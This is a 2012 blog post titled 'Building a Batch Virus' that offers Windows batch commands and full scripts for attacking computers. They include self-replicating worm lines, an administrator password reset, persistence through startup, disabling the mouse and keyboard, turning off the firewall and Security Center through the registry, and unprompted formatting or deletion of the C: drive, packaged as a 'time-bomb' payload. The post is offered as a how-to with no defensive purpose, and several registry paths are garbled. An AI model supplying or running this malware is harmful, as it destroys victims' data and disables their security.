Thursday, 16 February 2012

Building a Batch Virus

In DOS, OS/2 and Microsoft Windows a Batch File is a text file containing a series of commands intended to be executed by the command interpreter. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands. Batch files are useful for running a sequence of executables automatically and are often used to automate repetitive or tedious processes.

DOS batch files have the filename extension .bat. Batch files for other environments may have different extensions, e.g. .cmd or .bat in the Microsoft Windows NT-family of operating systems and OS/2, or .btm in 4DOS and 4NT related shells. The Windows 9x family of operating systems only recognize the .bat extension






Example Commands

Swap mouse buttons:

rundll32 user,swapmousebutton

Open the URL you want:

start http://www.google.com

Shut down the computer and show any message you want:

shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f

Disable mouse till next restart:

rundll32 mouse,disable

Disable keyboard till next restart:

rundll32 keyboard,disable

Freezes computer till restart:

rundll32 user,disableoemlayer

=======================================================================


Worm commands:

That command (two lines) will copy itself to any batch file in the directory.

ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"

Clears other batch file's source and copies itself to it.

%0 >>other.bat

=======================================================================


Trojan Codes:

Sends list of files in same directory into a text document, and places it into a text document in the same directory.

dir *.*>>Filelist.txt

Changes specific user account's password to whatever you want.

net user administrator PASSWORD HERE

Creates a text file with ip address information in same directory as batch file.

ipconfig >Computer-IP-address.txt

Copies itself to the AutoRun section of windows.

COPY %0 %windir%WINSTART.BAT

Formats c drive without asking.

format c: /q /autotest

Deletes windows

DELTREE /Y %windir%

Deletes C: Drive, /F means forced, /S deletes whole tree, /Q makes it quiet so it does not ask permittion.

DEL /F /S /Q C:

This is a potential Time-Bomb virus and remember to change the date!

Quote:@echo off
echo. | date | find /c /i "2005.05.10" > NUL
If errorlevel 1 GoTo End
YOUR 'VIRUS' CODE HERE.
:End

The following will turn off the firewall and stop the security center.

Quote:net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS
haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw
uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

This code is also a Time-Bomb

@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo You got owned!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start http://www.fbi.gov
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices
SharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
Serviceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Services
wscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Your computer is destroyed" -f


0 comments:

Post a Comment